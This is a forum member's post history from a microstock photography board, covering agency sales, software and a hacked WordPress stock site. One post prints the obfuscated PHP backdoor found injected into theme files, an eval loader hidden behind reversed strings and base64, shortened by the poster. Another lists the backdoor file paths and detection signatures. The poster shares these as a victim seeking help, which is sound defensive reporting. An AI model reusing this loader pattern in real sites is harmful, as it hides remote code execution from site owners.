pancakes

MicrostockGroup Sponsors


Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - LesPalenik

Pages: 1 2 3 4 5 [6] 7 8 9 10 11 ... 20
126
I just got some more information from ipower.

They don't think the hack came from Yoast or within their network, but possibly from a script hack in another plugin or through FTP. I doubt that it came from my computer, since I haven't accessed my Symbiostock site for a long time.
The lesson is not to rely just on the Wordfence, but run also Sitelock or some other similar tools, or check manually in the previously mentioned directories for suspicious back door php files.

 

127
UPDATE:

Wordfence (free version) detected the infected php files in Themes only.
However, my host provider (ipower.com) ran subsequently the Sitelock utility that found two types of backdoor code in the following files:

evvy_colby.php: SiteLock-PHP-UPLOADER-1-bt in the home directory

and then JCDEF.Obfus.CreateFunc.BackDoorEval-21. in the following files

/wp-admin/theme-install_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/user/menu_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/maint/repair_ver1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/network/edit_indesit.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/js/common.min_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/_mixins_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/light/colors_infoold.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/blue/colors-rtl.min_noversion.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/css/colors/coffee/colors-rtl.min_prevv1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.
/wp-admin/includes/export_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-21.

Looking at the site stats, I saw over 500 hits at the login.php in the last two weeks (I didn't log in at all), but I doubt that they cracked the password (I changed it anyway).

If this infection happened indeed through Yoast SEO, there is a good chance that my site was not the only one compromised Symbiostock site.
You might want to check your site also for the above files (plus the functions.php in Themes).
 


128
Buffalo, NY. Lof of diffused light in the winter.

129
I updated Symbiostock theme and all plugins, changed the password, the disturbing message is gone, let's hope it will stay so.

Last week, I received a note from my host provider about security vulnerability regarding the WordPress SEO by Yoast plugin (allegebly discovered and patched - but maybe too late for me), so that could have been the culprit.
 
http://thehackernews.com/2015/03/wordpress-seo-by-yoast-plugin.html

130
I haven't checked nor updated my Symbio site for a while, and when I finally did, I found a "viagra" link displayed between the stock site name and image title.
Linked to the following URL: www.xxxpowersconstruction.net/viagra-prices-cvs  (inserted xxx into the name, not to reward this scumbag)

After running Wordfence analysis, that utility reported a number of malicious php files in the wp-content directory.

Critical Problems:
* File appears to be malicious: wp-content/themes/advantica/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old/functions.php
* File appears to be malicious: wp-content/themes/clean-theme-2-0-1-old2/functions.php
* File appears to be malicious: wp-content/themes/smallbiz/functions.php
* File appears to be malicious: wp-content/themes/symbiostock/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-dragonfly/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old/functions.php
* File appears to be malicious: wp-content/themes/symbiostock-old2/functions.php
* File appears to be malicious: wp-content/themes/twentyeleven/functions.php

and a few other themes


This is the data found in the php files (I shortened the code disguised as some gibberish shown in bold from about 80 lines to 1 line only - to eliminate any possibility of spreading this virus further):
<?php
$wp_user_functions_init = create_function('$a',strrev(';)a$(lave'));
 $wp_user_functions_init(strrev(';))"=oQD9pQD7kiIwhGcf52bpR3YuVnZft2YhJGbsF2YigCdyFGdz9lYvlgCNsXKpcCdyFGdz9lYvdCKzR3cphZoYWa"(edoced_46esab(lave'));
?>

Not knowing much about php code, I deleted ALL the lines in the php files, and that got rid of the offending link, but I wonder if I should have some information in those php files. If symbiostock/functions.php should contain some essential information, please, let me know what it should be.
 
I also wonder how my site got hacked. If my php files got infected through some plugin/theme, by direct attack to my Symbiosite or laterally on my host site.

131
Shutterstock.com / Re: Shutterstock Reports Q3 2014 Results
« on: March 13, 2015, 11:04 »
Sudden increase in SS stock price, despite all markets being down.
About $7 (12-15%) up in last two days. Latest price over $64. No idea what is the cause for the extraordinary rise.
No new financial news available, could be due to purchases by insiders who know more than the shareholders.
   

132
$9.99 a month for unlimited downloads?

133
General Stock Discussion / Re: Best microstock news site?
« on: March 10, 2015, 05:28 »
Leo,

is the new release of Symbiostock imminent?

134
Searching the SS database by those keywords didn't result in any matches, so this cenceptual category might be a promising niche.

135
General Stock Discussion / Re: February 2015 sales
« on: March 02, 2015, 08:31 »
What is FAA?
found through Google:
Federal Aviation Administration

136
Quote
Someone said there are 200 Reviewers?

If there are indeed 200 reviewers, 400,000 accepted images per week, and average acceptance rate is about 50%, that would translate to 4000 inspected images for each reviewer in a week. At 25% acceptance - 8,000 inspected images per reviewer per week or over 1,000 per day. 8,000 viewed images paid by 5 cents each would translate to $400 a week in remuneration for each inspector. Significantly higher than an average contributor would make.




137
General Stock Discussion / Re: Distortion acceptable
« on: February 21, 2015, 21:51 »
Ron, that's not very healthy food. It could lead to distortions also in other places.

138
On  the other front, Afinity Photo released their new alternative to Photoshop. Only for Mac.

http://www.pastemagazine.com/articles/2015/02/affinity-photo-app-gives-photoshop-a-run-for-its-m.html

Sounds interesting. And comes without a subscription plan. Actually, for a limited time, it's completely free to download. Anybody has tried it?

139
Shutterstock.com / Re: Shutterstock sales is sinking deeply...
« on: February 01, 2015, 21:50 »
Quote
'408,315 new stock images added this week'
That's an insane number

400,000 a week adds up to over 20 millions/year or 200 millions in 10 years (not counting existing inventory)
However, since the growth has been closer to exponential rather than to linear, we could see 500 million new images in ten years.

140
Several years ago, a national magazine (I don't remember which one) ran a story about about some shady pharmacy practices and to embellish their article, they used a stock photo of an elderly pharmacist in a white coat with a title "Would you trust this man?" or something along those lines.  I don't remember all the details, but for the pharmacist it was a personal and business disaster. As far as as I know, the magazine claimed a legal usage of the photo.

Could you be thinking of this?:
http://www.microstockgroup.com/off-topic/model-release-question-for-doctorsdds-photo-sessions/msg316441/#msg316441
I'm always astounded at the number of 'family and friends' who seem to be willing to model (and togs that are willing to use them), knowing the types of legal usages which are permitted, far less abuses. I'm presuming that many of these people have (or hope to have) real jobs, or are known in communities, where any number of legitimate uses could backfire on them. Weird.

Thanks, Susan, that could be it, the title being ""Is your pharmacist killing you?".
I googled for that published article, but couldn't find it anymore.

141
Quote
Those who focus on the model and whether she was posing in lingerie or not, are missing the point totally.
There is a bigger issue here.
The thing in question here is whether a photographer can be held responsible for what an end user is doing with his/her photos.
If the end user is breaching a TOS, how the h*ll can the photographer be responsible.
If you think that this only concerns photographers who shoots lingerie you are way off.
This concerns everyone who shoots people for stock.
Regular portraits of "regular" girls, grandmothers and even kids are being misused everyday and if the model should win this case, this industry will have to change drastically on many levels.

Indeed!
Several years ago, a national magazine (I don't remember which one) ran a story about about some shady pharmacy practices and to embellish their article, they used a stock photo of an elderly pharmacist in a white coat with a title "Would you trust this man?" or something along those lines.  I don't remember all the details, but for the pharmacist it was a personal and business disaster. As far as as I know, the magazine claimed a legal usage of the photo.

142
General Stock Discussion / Re: where do you get inspiration
« on: January 27, 2015, 08:57 »
The sock photos with models are easy, but keep away from models without socks.

144
General Stock Discussion / Re: New Year Predictions
« on: January 09, 2015, 13:55 »
And once you reach 1000 images in your portfolio, you'll get bonus gifts:

From SS - a Nikon D810 with 70-200/F2.8 lens
From DT - All-Paid trip to Antarctica including Canon 7DII with 500/F4 lens
From IS -  January trip to Calgary, and a GIMP program (Travel costs to be paid by the artist, but GIMP is free).
Fotolia - Automatic conversion of your existing DollarPhotoClub port to Adobe Half-A-Buck PhotoClub port

145
iStockPhoto.com / Re: Anybody know any Rasberries?
« on: December 24, 2014, 13:30 »
Quote
Just a random berry release won't do. You need a release for each of the berries in the image.

And not just some old raspberry release. You'll need a new release with a recent date.

146
Classy promotion by Dreamstime!
What a refreshing move compared with some other agencies that use any opportunity to extract ever more from the contributors.

147
1. Small photos are not free
2. The market for 500 pixel images for blogs and online magazines is large enough not to be ignored

148
Adobe Stock / Re: Adobe shakes things up
« on: December 12, 2014, 14:23 »
what will the other players do now?

Well I've heard a rumour that the Gimp is planning to buy Dreamstime.

This could be in response to ACDsee introduction of layers. Adobe must have felt threatened.

149
Quote
Unfortunately I'm currently an exclusive at IS ( with the emphasis on 'currently'

I would put emphasis on "Unfortunately"

150
Software - General / Re: Topaz Promotions
« on: December 12, 2014, 07:30 »
Topaz Labs has released this month a new plugin called Glow.
This program produces "electric" outlines and other luminescent contour effects. Most of the presets are quite surreal, but not all of them are "glowing". When applied gently, some of the presets can enhance and improve an image in a nice way. As with the other Topaz plugins, not all images will benefit from using this technique, but if you want to experiment with your images, you may find this plugin useful for some artistic renditions. I found some of the glow effects work well on metallic surfaces, but as with any artistic treatments, it's very personal.

The introductory price of $49.99 is offered till December 31st, 2014 (regular price is $69.99). To see the Topaz Glow Before-And-After examples or to download a free trial version or to purchase it, use the following link:

http://www.topazlabs.com/aff/idevaffiliate.php?id=861&url=http://www.topazlabs.com/glow

and enter "introglow" as the coupon code to get the $20 discount. If you already own the Topaz Collection, login with your id, and you'll get another $10 off.

More information on my blogsite:
Topaz Glow Mini Review

Pages: 1 2 3 4 5 [6] 7 8 9 10 11 ... 20

Sponsors

Mega Bundle of 5,900+ Professional Lightroom Presets

Microstock Poll Results

Sponsors